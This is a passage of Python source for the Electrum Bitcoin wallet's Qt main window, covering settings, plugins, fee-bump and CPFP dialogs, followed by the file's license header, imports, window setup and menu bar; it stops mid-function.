_('Fiat')), (id_widgets, _('Identity')), ] for widgets, name in tabs_info: tab = QWidget() grid = QGridLayout(tab) grid.setColumnStretch(0,1) for a,b in widgets: i = grid.rowCount() if b: if a: grid.addWidget(a, i, 0) grid.addWidget(b, i, 1) else: grid.addWidget(a, i, 0, 1, 2) tabs.addTab(tab, name) vbox.addWidget(tabs) vbox.addStretch(1) vbox.addLayout(Buttons(CloseButton(d))) d.setLayout(vbox) # run the dialog d.exec_() if self.fx: self.fx.trigger_update() self.alias_received_signal.disconnect(set_alias_color) run_hook('close_settings_dialog') if self.need_restart: self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success')) def closeEvent(self, event): # It seems in some rare cases this closeEvent() is called twice if not self.cleaned_up: self.cleaned_up = True self.clean_up() event.accept() def clean_up(self): self.wallet.thread.stop() if self.network: self.network.unregister_callback(self.on_network) self.network.unregister_callback(self.on_quotes) self.network.unregister_callback(self.on_history) self.config.set_key("is_maximized", self.isMaximized()) if not self.isMaximized(): g = self.geometry() self.wallet.storage.put("winpos-qt", [g.left(),g.top(), g.width(),g.height()]) self.config.set_key("console-history", self.console.history[-50:], True) if self.qr_window: self.qr_window.close() self.close_wallet() self.gui_object.timer.timeout.disconnect(self.timer_actions) self.gui_object.close_window(self) def plugins_dialog(self): self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins')) plugins = self.gui_object.plugins vbox = QVBoxLayout(d) # plugins scroll = QScrollArea() scroll.setEnabled(True) scroll.setWidgetResizable(True) scroll.setMinimumSize(400,250) vbox.addWidget(scroll) w = QWidget() scroll.setWidget(w) w.setMinimumHeight(plugins.count() * 35) grid = QGridLayout() grid.setColumnStretch(0,1) w.setLayout(grid) settings_widgets = {} def enable_settings_widget(p, name, i): widget = settings_widgets.get(name) if not widget and p and p.requires_settings(): widget = settings_widgets[name] = p.settings_widget(d) grid.addWidget(widget, i, 1) if widget: widget.setEnabled(bool(p and p.is_enabled())) def do_toggle(cb, name, i): p = plugins.toggle(name) cb.setChecked(bool(p)) enable_settings_widget(p, name, i) run_hook('init_qt', 
                     self.gui_object)

        for i, descr in enumerate(plugins.descriptions.values()):
            full_name = descr['__name__']
            prefix, _separator, name = full_name.rpartition('.')
            p = plugins.get(name)
            if descr.get('registers_keystore'):
                continue
            try:
                cb = QCheckBox(descr['fullname'])
                plugin_is_loaded = p is not None
                cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
                              or plugin_is_loaded and p.can_user_disable())
                cb.setEnabled(cb_enabled)
                cb.setChecked(plugin_is_loaded and p.is_enabled())
                grid.addWidget(cb, i, 0)
                enable_settings_widget(p, name, i)
                cb.clicked.connect(partial(do_toggle, cb, name, i))
                msg = descr['description']
                if descr.get('requires'):
                    msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
                grid.addWidget(HelpButton(msg), i, 2)
            except Exception:
                self.logger.exception(f"cannot display plugin {name}")
        grid.setRowStretch(len(plugins.descriptions.values()), 1)
        vbox.addLayout(Buttons(CloseButton(d)))
        d.exec_()

    def cpfp(self, parent_tx, new_tx):
        total_size = parent_tx.estimated_size() + new_tx.estimated_size()
        parent_fee = self.wallet.get_tx_fee(parent_tx)
        if parent_fee is None:
            self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
            return
        d = WindowModalDialog(self, _('Child Pays for Parent'))
        vbox = QVBoxLayout(d)
        msg = (
            "A CPFP is a transaction that sends an unconfirmed output back to "
            "yourself, with a high fee. The goal is to have miners confirm "
            "the parent transaction in order to get the fee attached to the "
            "child transaction.")
        vbox.addWidget(WWLabel(_(msg)))
        msg2 = ("The proposed fee is computed using your "
                "fee/kB settings, applied to the total size of both child and "
                "parent transactions. After you broadcast a CPFP transaction, "
                "it is normal to see a new unconfirmed transaction in your history.")
        vbox.addWidget(WWLabel(_(msg2)))
        grid = QGridLayout()
        grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
        grid.addWidget(QLabel('%d bytes' % total_size), 0, 1)
        max_fee = new_tx.output_value()
        grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
        grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
        output_amount = QLabel('')
        grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
        grid.addWidget(output_amount, 2, 1)
        fee_e = BTCAmountEdit(self.get_decimal_point)
        # FIXME with dyn fees, without estimates, there are all kinds of crashes here
        combined_fee = QLabel('')
        combined_feerate = QLabel('')

        def on_fee_edit(x):
            out_amt = max_fee - fee_e.get_amount()
            out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
            output_amount.setText(out_amt_str)
            comb_fee = parent_fee + fee_e.get_amount()
            comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
            combined_fee.setText(comb_fee_str)
            comb_feerate = comb_fee / total_size * 1000
            comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
            combined_feerate.setText(comb_feerate_str)
        fee_e.textChanged.connect(on_fee_edit)

        def get_child_fee_from_total_feerate(fee_per_kb):
            fee = fee_per_kb * total_size / 1000 - parent_fee
            fee = min(max_fee, fee)
            fee = max(total_size, fee)  # pay at least 1 sat/byte for combined size
            return fee
        suggested_feerate = self.config.fee_per_kb()
        if suggested_feerate is None:
            self.show_error(f'''{_("Can't CPFP")}: {_('Dynamic fee estimates not available')}''')
            return
        fee = get_child_fee_from_total_feerate(suggested_feerate)
        fee_e.setAmount(fee)
        grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
        grid.addWidget(fee_e, 3, 1)

        def on_rate(dyn, pos,
fee_rate): fee = get_child_fee_from_total_feerate(fee_rate) fee_e.setAmount(fee) fee_slider = FeeSlider(self, self.config, on_rate) fee_slider.update() grid.addWidget(fee_slider, 4, 1) grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0) grid.addWidget(combined_fee, 5, 1) grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0) grid.addWidget(combined_feerate, 6, 1) vbox.addLayout(grid) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if not d.exec_(): return fee = fee_e.get_amount() if fee > max_fee: self.show_error(_('Max fee exceeded')) return new_tx = self.wallet.cpfp(parent_tx, fee) new_tx.set_rbf(True) self.show_transaction(new_tx) def bump_fee_dialog(self, tx): fee = self.wallet.get_tx_fee(tx) if fee is None: self.show_error(_("Can't bump fee: unknown fee for original transaction.")) return tx_label = self.wallet.get_label(tx.txid()) tx_size = tx.estimated_size() old_fee_rate = fee / tx_size # sat/vbyte d = WindowModalDialog(self, _('Bump Fee')) vbox = QVBoxLayout(d) vbox.addWidget(WWLabel(_("Increase your transaction's fee to improve its position in mempool."))) vbox.addWidget(QLabel(_('Current Fee') + ': %s'% self.format_amount(fee) + ' ' + self.base_unit())) vbox.addWidget(QLabel(_('Current Fee rate') + ': %s' % self.format_fee_rate(1000 * old_fee_rate))) vbox.addWidget(QLabel(_('New Fee rate') + ':')) def on_textedit_rate(): fee_slider.deactivate() feerate_e = FeerateEdit(lambda: 0) feerate_e.setAmount(max(old_fee_rate * 1.5, old_fee_rate + 1)) feerate_e.textEdited.connect(on_textedit_rate) vbox.addWidget(feerate_e) def on_slider_rate(dyn, pos, fee_rate): fee_slider.activate() if fee_rate is not None: feerate_e.setAmount(fee_rate / 1000) fee_slider = FeeSlider(self, self.config, on_slider_rate) fee_slider.deactivate() vbox.addWidget(fee_slider) cb = QCheckBox(_('Final')) vbox.addWidget(cb) vbox.addLayout(Buttons(CancelButton(d), OkButton(d))) if not d.exec_(): return is_final = cb.isChecked() new_fee_rate = feerate_e.get_amount() try: new_tx = self.wallet.bump_fee(tx=tx, new_fee_rate=new_fee_rate, config=self.config) except CannotBumpFee as e: self.show_error(str(e)) return if is_final: new_tx.set_rbf(False) self.show_transaction(new_tx, tx_label) def save_transaction_into_wallet(self, tx): win = self.top_level_window() try: if not self.wallet.add_transaction(tx.txid(), tx): win.show_error(_("Transaction could not be saved.") + "\n" + _("It conflicts with current history.")) return False except AddTransactionException as e: win.show_error(e) return False else: self.wallet.storage.write() # need to update at least: history_list, utxo_list, address_list self.need_update.set() msg = (_("Transaction added to wallet history.") + '\n\n' + _("Note: this is an offline transaction, if you want the network " "to see it, you need to broadcast it.")) win.msg_box(QPixmap(icon_path("offline_tx.png")), None, _('Success'), msg) return True
#!/usr/bin/env python # # Electrum - lightweight Bitcoin client # Copyright (C) 2012 thomasv@gitorious # # Permission is hereby granted, free of charge, to any person # obtaining a copy of this software and associated documentation files # (the "Software"), to deal in the Software without restriction, # including without limitation the rights to use, copy, modify, merge, # publish, distribute, sublicense, and/or sell copies of the Software, # and to permit persons to whom the Software is furnished to do so, # subject to the following conditions: # # The above copyright notice and this permission notice shall be # included in all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND # NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS # BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN # ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN # CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE # SOFTWARE. import sys import time import threading import os import traceback import json import shutil import weakref import webbrowser import csv from decimal import Decimal import base64 from functools import partial import queue import asyncio from typing import Optional from PyQt5.QtGui import QPixmap, QKeySequence, QIcon, QCursor from PyQt5.QtCore import Qt, QRect, QStringListModel, QSize, pyqtSignal from PyQt5.QtWidgets import (QMessageBox, QComboBox, QSystemTrayIcon, QTabWidget, QSpinBox, QMenuBar, QFileDialog, QCheckBox, QLabel, QVBoxLayout, QGridLayout, QLineEdit, QTreeWidgetItem, QHBoxLayout, QPushButton, QScrollArea, QTextEdit, QShortcut, QMainWindow, QCompleter, QInputDialog, QWidget, QMenu, QSizePolicy, QStatusBar) import electrum from electrum import (keystore, simple_config, ecc, constants, util, bitcoin, commands, coinchooser, paymentrequest) from electrum.bitcoin import COIN, is_address, TYPE_ADDRESS from electrum.plugin import run_hook from electrum.i18n import _ from electrum.util import (format_time, format_satoshis, format_fee_satoshis, format_satoshis_plain, NotEnoughFunds, UserCancelled, NoDynamicFeeEstimates, profiler, export_meta, import_meta, bh2u, bfh, InvalidPassword, base_units, base_units_list, base_unit_name_to_decimal_point, decimal_point_to_base_unit_name, quantize_feerate, UnknownBaseUnit, DECIMAL_POINT_DEFAULT, UserFacingException, get_new_wallet_name, send_exception_to_crash_reporter, InvalidBitcoinURI) from electrum.transaction import Transaction, TxOutput from electrum.address_synchronizer import AddTransactionException from electrum.wallet import (Multisig_Wallet, CannotBumpFee, Abstract_Wallet, sweep_preparations, InternalAddressCorruption) from electrum.version import ELECTRUM_VERSION from electrum.network import Network, TxBroadcastError, BestEffortRequestFailed from electrum.exchange_rate import FxThread from electrum.simple_config import SimpleConfig from electrum.logging import Logger from electrum.paymentrequest import PR_PAID from .exception_window import Exception_Hook from .amountedit import AmountEdit, BTCAmountEdit, MyLineEdit, FeerateEdit from .qrcodewidget import QRCodeWidget, QRDialog from .qrtextedit import ShowQRTextEdit, ScanQRTextEdit from .transaction_dialog import show_transaction from .fee_slider import FeeSlider from .util import (read_QIcon, ColorScheme, text_dialog, icon_path, WaitingDialog, 
WindowModalDialog, ChoicesLayout, HelpLabel, FromList, Buttons, OkButton, InfoButton, WWLabel, TaskThread, CancelButton, CloseButton, HelpButton, MessageBoxMixin, EnterButton, expiration_values, ButtonsLineEdit, CopyCloseButton, import_meta_gui, export_meta_gui, filename_field, address_field) from .installwizard import WIF_HELP_TEXT from .history_list import HistoryList, HistoryModel from .update_checker import UpdateCheck, UpdateCheckThread class StatusBarButton(QPushButton): def __init__(self, icon, tooltip, func): QPushButton.__init__(self, icon, '') self.setToolTip(tooltip) self.setFlat(True) self.setMaximumWidth(25) self.clicked.connect(self.onPress) self.func = func self.setIconSize(QSize(25,25)) self.setCursor(QCursor(Qt.PointingHandCursor)) def onPress(self, checked=False): '''Drops the unwanted PyQt5 "checked" argument''' self.func() def keyPressEvent(self, e): if e.key() == Qt.Key_Return: self.func() class ElectrumWindow(QMainWindow, MessageBoxMixin, Logger): payment_request_ok_signal = pyqtSignal() payment_request_error_signal = pyqtSignal() new_fx_quotes_signal = pyqtSignal() new_fx_history_signal = pyqtSignal() network_signal = pyqtSignal(str, object) alias_received_signal = pyqtSignal() computing_privkeys_signal = pyqtSignal() show_privkeys_signal = pyqtSignal() def __init__(self, gui_object, wallet: Abstract_Wallet): QMainWindow.__init__(self) self.gui_object = gui_object self.config = config = gui_object.config # type: SimpleConfig self.gui_thread = gui_object.gui_thread self.setup_exception_hook() self.network = gui_object.daemon.network # type: Network assert wallet, "no wallet" self.wallet = wallet self.fx = gui_object.daemon.fx # type: FxThread self.invoices = wallet.invoices self.contacts = wallet.contacts self.tray = gui_object.tray self.app = gui_object.app self.cleaned_up = False self.payment_request = None # type: Optional[paymentrequest.PaymentRequest] self.checking_accounts = False self.qr_window = None self.not_enough_funds = False self.pluginsdialog = None self.require_fee_update = False self.tl_windows = [] self.tx_external_keypairs = {} Logger.__init__(self) self.tx_notification_queue = queue.Queue() self.tx_notification_last_time = 0 self.create_status_bar() self.need_update = threading.Event() self.decimal_point = config.get('decimal_point', DECIMAL_POINT_DEFAULT) try: decimal_point_to_base_unit_name(self.decimal_point) except UnknownBaseUnit: self.decimal_point = DECIMAL_POINT_DEFAULT self.num_zeros = int(config.get('num_zeros', 0)) self.completions = QStringListModel() self.tabs = tabs = QTabWidget(self) self.send_tab = self.create_send_tab() self.receive_tab = self.create_receive_tab() self.addresses_tab = self.create_addresses_tab() self.utxo_tab = self.create_utxo_tab() self.console_tab = self.create_console_tab() self.contacts_tab = self.create_contacts_tab() tabs.addTab(self.create_history_tab(), read_QIcon("tab_history.png"), _('History')) tabs.addTab(self.send_tab, read_QIcon("tab_send.png"), _('Send')) tabs.addTab(self.receive_tab, read_QIcon("tab_receive.png"), _('Receive')) def add_optional_tab(tabs, tab, icon, description, name): tab.tab_icon = icon tab.tab_description = description tab.tab_pos = len(tabs) tab.tab_name = name if self.config.get('show_{}_tab'.format(name), False): tabs.addTab(tab, icon, description.replace("&", "")) add_optional_tab(tabs, self.addresses_tab, read_QIcon("tab_addresses.png"), _("&Addresses"), "addresses") add_optional_tab(tabs, self.utxo_tab, read_QIcon("tab_coins.png"), _("Co&ins"), "utxo") add_optional_tab(tabs, 
self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts") add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console") tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding) self.setCentralWidget(tabs) if self.config.get("is_maximized"): self.showMaximized() self.setWindowIcon(read_QIcon("electrum.png")) self.init_menubar() wrtabs = weakref.proxy(tabs) QShortcut(QKeySequence("Ctrl+W"), self, self.close) QShortcut(QKeySequence("Ctrl+Q"), self, self.close) QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet) QShortcut(QKeySequence("F5"), self, self.update_wallet) QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count())) QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count())) for i in range(wrtabs.count()): QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i)) self.payment_request_ok_signal.connect(self.payment_request_ok) self.payment_request_error_signal.connect(self.payment_request_error) self.history_list.setFocus(True) # network callbacks if self.network: self.network_signal.connect(self.on_network_qt) interests = ['wallet_updated', 'network_updated', 'blockchain_updated', 'new_transaction', 'status', 'banner', 'verified', 'fee', 'fee_histogram'] # To avoid leaking references to "self" that prevent the # window from being GC-ed when closed, callbacks should be # methods of this class only, and specifically not be # partials, lambdas or methods of subobjects. Hence... self.network.register_callback(self.on_network, interests) # set initial message self.console.showMessage(self.network.banner) self.network.register_callback(self.on_quotes, ['on_quotes']) self.network.register_callback(self.on_history, ['on_history']) self.new_fx_quotes_signal.connect(self.on_fx_quotes) self.new_fx_history_signal.connect(self.on_fx_history) # update fee slider in case we missed the callback self.fee_slider.update() self.load_wallet(wallet) gui_object.timer.timeout.connect(self.timer_actions) self.fetch_alias() # If the option hasn't been set yet if config.get('check_updates') is None: choice = self.question(title="Electrum - " + _("Enable update check"), msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " + _("Would you like to be notified when there is a newer version of Electrum available?")) config.set_key('check_updates', bool(choice), save=True) if config.get('check_updates', False): # The references to both the thread and the window need to be stored somewhere # to prevent GC from getting in our way. 
def on_version_received(v): if UpdateCheck.is_newer(v): self.update_check_button.setText(_("Update to Electrum {} is available").format(v)) self.update_check_button.clicked.connect(lambda: self.show_update_check(v)) self.update_check_button.show() self._update_check_thread = UpdateCheckThread(self) self._update_check_thread.checked.connect(on_version_received) self._update_check_thread.start() def on_history(self, b): self.wallet.clear_coin_price_cache() self.new_fx_history_signal.emit() def setup_exception_hook(self): Exception_Hook(self) def on_fx_history(self): self.history_model.refresh('fx_history') self.address_list.update() def on_quotes(self, b): self.new_fx_quotes_signal.emit() def on_fx_quotes(self): self.update_status() # Refresh edits with the new rate edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e edit.textEdited.emit(edit.text()) edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e edit.textEdited.emit(edit.text()) # History tab needs updating if it used spot if self.fx.history_used_spot: self.history_model.refresh('fx_quotes') self.address_list.update() def toggle_tab(self, tab): show = not self.config.get('show_{}_tab'.format(tab.tab_name), False) self.config.set_key('show_{}_tab'.format(tab.tab_name), show) item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description) tab.menu_action.setText(item_text) if show: # Find out where to place the tab index = len(self.tabs) for i in range(len(self.tabs)): try: if tab.tab_pos < self.tabs.widget(i).tab_pos: index = i break except AttributeError: pass self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", "")) else: i = self.tabs.indexOf(tab) self.tabs.removeTab(i) def push_top_level_window(self, window): '''Used for e.g. tx dialog box to ensure new dialogs are appropriately parented. 
This used to be done by explicitly providing the parent window, but that isn't something hardware wallet prompts know.''' self.tl_windows.append(window) def pop_top_level_window(self, window): self.tl_windows.remove(window) def top_level_window(self, test_func=None): '''Do the right thing in the presence of tx dialog windows''' override = self.tl_windows[-1] if self.tl_windows else None if override and test_func and not test_func(override): override = None # only override if ok for test_func return self.top_level_window_recurse(override, test_func) def diagnostic_name(self): #return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name()) return self.wallet.diagnostic_name() def is_hidden(self): return self.isMinimized() or self.isHidden() def show_or_hide(self): if self.is_hidden(): self.bring_to_top() else: self.hide() def bring_to_top(self): self.show() self.raise_() def on_error(self, exc_info): e = exc_info[1] if isinstance(e, UserCancelled): pass elif isinstance(e, UserFacingException): self.show_error(str(e)) else: try: self.logger.error("on_error", exc_info=exc_info) except OSError: pass # see #4418 self.show_error(str(e)) def on_network(self, event, *args): if event == 'wallet_updated': wallet = args[0] if wallet == self.wallet: self.need_update.set() elif event == 'network_updated': self.gui_object.network_updated_signal_obj.network_updated_signal \ .emit(event, args) self.network_signal.emit('status', None) elif event == 'blockchain_updated': # to update number of confirmations in history self.need_update.set() elif event == 'new_transaction': wallet, tx = args if wallet == self.wallet: self.tx_notification_queue.put(tx) elif event in ['status', 'banner', 'verified', 'fee', 'fee_histogram']: # Handle in GUI thread self.network_signal.emit(event, args) else: self.logger.info(f"unexpected network message: {event} {args}") def on_network_qt(self, event, args=None): # Handle a network message in the GUI thread if event == 'status': self.update_status() elif event == 'banner': self.console.showMessage(args[0]) elif event == 'verified': wallet, tx_hash, tx_mined_status = args if wallet == self.wallet: self.history_model.update_tx_mined_status(tx_hash, tx_mined_status) elif event == 'fee': if self.config.is_dynfee(): self.fee_slider.update() self.require_fee_update = True elif event == 'fee_histogram': if self.config.is_dynfee(): self.fee_slider.update() self.require_fee_update = True self.history_model.on_fee_histogram() else: self.logger.info(f"unexpected network_qt signal: {event} {args}") def fetch_alias(self): self.alias_info = None alias = self.config.get('alias') if alias: alias = str(alias) def f(): self.alias_info = self.contacts.resolve_openalias(alias) self.alias_received_signal.emit() t = threading.Thread(target=f) t.setDaemon(True) t.start() def close_wallet(self): if self.wallet: self.logger.info(f'close_wallet {self.wallet.storage.path}') run_hook('close_wallet', self.wallet) @profiler def load_wallet(self, wallet): wallet.thread = TaskThread(self, self.on_error) self.update_recently_visited(wallet.storage.path) self.need_update.set() # Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized # update menus self.seed_menu.setEnabled(self.wallet.has_seed()) self.update_lock_icon() self.update_buttons_on_seed() self.update_console() self.clear_receive_tab() self.request_list.update() self.tabs.show() self.init_geometry() if self.config.get('hide_gui') and 
self.gui_object.tray.isVisible(): self.hide() else: self.show() self.watching_only_changed() run_hook('load_wallet', wallet, self) try: wallet.try_detecting_internal_addresses_corruption() except InternalAddressCorruption as e: self.show_error(str(e)) send_exception_to_crash_reporter(e) def init_geometry(self): winpos = self.wallet.storage.get("winpos-qt") try: screen = self.app.desktop().screenGeometry() assert screen.contains(QRect(*winpos)) self.setGeometry(*winpos) except: self.logger.info("using default geometry") self.setGeometry(100, 100, 840, 400) def watching_only_changed(self): name = "Electrum Testnet" if constants.net.TESTNET else "Electrum" title = '%s %s - %s' % (name, ELECTRUM_VERSION, self.wallet.basename()) extra = [self.wallet.storage.get('wallet_type', '?')] if self.wallet.is_watching_only(): extra.append(_('watching only')) title += ' [%s]'% ', '.join(extra) self.setWindowTitle(title) self.password_menu.setEnabled(self.wallet.may_have_password()) self.import_privkey_menu.setVisible(self.wallet.can_import_privkey()) self.import_address_menu.setVisible(self.wallet.can_import_address()) self.export_menu.setEnabled(self.wallet.can_export()) def warn_if_watching_only(self): if self.wallet.is_watching_only(): msg = ' '.join([ _("This wallet is watching-only."), _("This means you will not be able to spend Bitcoins with it."), _("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.") ]) self.show_warning(msg, title=_('Watch-only wallet')) def warn_if_testnet(self): if not constants.net.TESTNET: return # user might have opted out already if self.config.get('dont_show_testnet_warning', False): return # only show once per process lifecycle if getattr(self.gui_object, '_warned_testnet', False): return self.gui_object._warned_testnet = True msg = ''.join([ _("You are in testnet mode."), ' ', _("Testnet coins are worthless."), '\n', _("Testnet is separate from the main Bitcoin network. 
It is used for testing.") ]) cb = QCheckBox(_("Don't show this again.")) cb_checked = False def on_cb(x): nonlocal cb_checked cb_checked = x == Qt.Checked cb.stateChanged.connect(on_cb) self.show_warning(msg, title=_('Testnet'), checkbox=cb) if cb_checked: self.config.set_key('dont_show_testnet_warning', True) def open_wallet(self): try: wallet_folder = self.get_wallet_folder() except FileNotFoundError as e: self.show_error(str(e)) return filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder) if not filename: return self.gui_object.new_window(filename) def backup_wallet(self): path = self.wallet.storage.path wallet_folder = os.path.dirname(path) filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder) if not filename: return new_path = os.path.join(wallet_folder, filename) if new_path != path: try: shutil.copy2(path, new_path) self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created")) except BaseException as reason: self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup")) def update_recently_visited(self, filename): recent = self.config.get('recently_open', []) try: sorted(recent) except: recent = [] if filename in recent: recent.remove(filename) recent.insert(0, filename) recent = [path for path in recent if os.path.exists(path)] recent = recent[:5] self.config.set_key('recently_open', recent) self.recently_visited_menu.clear() for i, k in enumerate(sorted(recent)): b = os.path.basename(k) def loader(k): return lambda: self.gui_object.new_window(k) self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1))) self.recently_visited_menu.setEnabled(len(recent)) def get_wallet_folder(self): return os.path.dirname(os.path.abspath(self.config.get_wallet_path())) def new_wallet(self): try: wallet_folder = self.get_wallet_folder() except FileNotFoundError as e: self.show_error(str(e)) return filename = get_new_wallet_name(wallet_folder) full_path = os.path.join(wallet_folder, filename) self.gui_object.start_new_window(full_path, None) def init_menubar(self): menubar = QMenuBar() file_menu = menubar.addMenu(_("&File")) self.recently_visited_menu = file_menu.addMenu(_("&Recently open")) file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open) file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New) file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs) file_menu.addAction(_("Delete"), self.remove_wallet) file_menu.addSeparator() file_menu.addAction(_("&Quit"), self.close) wallet_menu = menubar.addMenu(_("&Wallet")) wallet_menu.addAction(_("&Information"), self.show_master_public_keys) wallet_menu.addSeparator() self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog) self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog) self.private_keys_menu = wallet_menu.addMenu(_("&Private keys")) self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog) self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey) self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog) self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses) wallet_menu.addSeparator() addresses_menu = 
wallet_menu.addMenu(_("&Addresses")) addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config)) labels_menu = wallet_menu.addMenu(_("&Labels")) labels_menu.addAction(_("&Import"), self.do_import_labels) labels_menu.addAction(_("&Export"), self.do_export_labels) history_menu = wallet_menu.addMenu(_("&History")) history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config)) history_menu.addAction(_("&Summary"), self.history_list.show_summary) history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog) history_menu.addAction(_("&Export"), self.history_list.export_history_dialog) contacts_menu = wallet_menu.addMenu(_("Contacts")) contacts_menu.addAction(_("&New"), self.new_contact_dialog) contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts()) contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts()) invoices_menu = wallet_menu.addMenu(_("Invoices")) invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices()) invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices()) wallet_menu.addSeparator() wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F")) def add_toggle_action(view_menu, tab): is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False) item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab)) view_menu = menubar.addMenu(_("&View")) add_toggle_action(view_menu, self.addresses_tab) add_toggle_action(view_menu, self.utxo_tab) add_toggle_action(view_menu, self.contacts_tab) add_toggle_action(view_menu, self.console_tab) tools_menu = menubar.addMenu(_("&Tools")) # Settings / Preferences are all reserved keywords in macOS using this as work around tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog) tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self)) tools_menu.addAction(_("&Plugins"), self.plugins_dialog) tools_menu.addSeparator() tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message) tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message) tools_menu.addSeparator() paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany) raw_transaction_menu = tools_menu.addMenu(_("&Load transaction")) raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file) raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text) raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid) raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode) self.raw_transaction_menu = raw_transaction_menu run_hook('init_menubar_tools', self, tools_menu) help_menu = menubar.addMenu(_("&Help")) help_menu.addAction(_("&About"), self.show_about) help_menu.addAction(_("&Check for updates"), self.show_update_check) help_menu.addAction(_("&Official website"), lambda: webbrowser.open("https://electrum.org")) help_menu.addSeparator() help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents) help_menu.addAction(_("&Report Bug"), self.show_report_bug) help_menu.addSeparator() help_menu.addAction(_("&Donate to server"), self.donate_to_server) self.setMenuBar(menubar) def donate_to_server(self): d = 
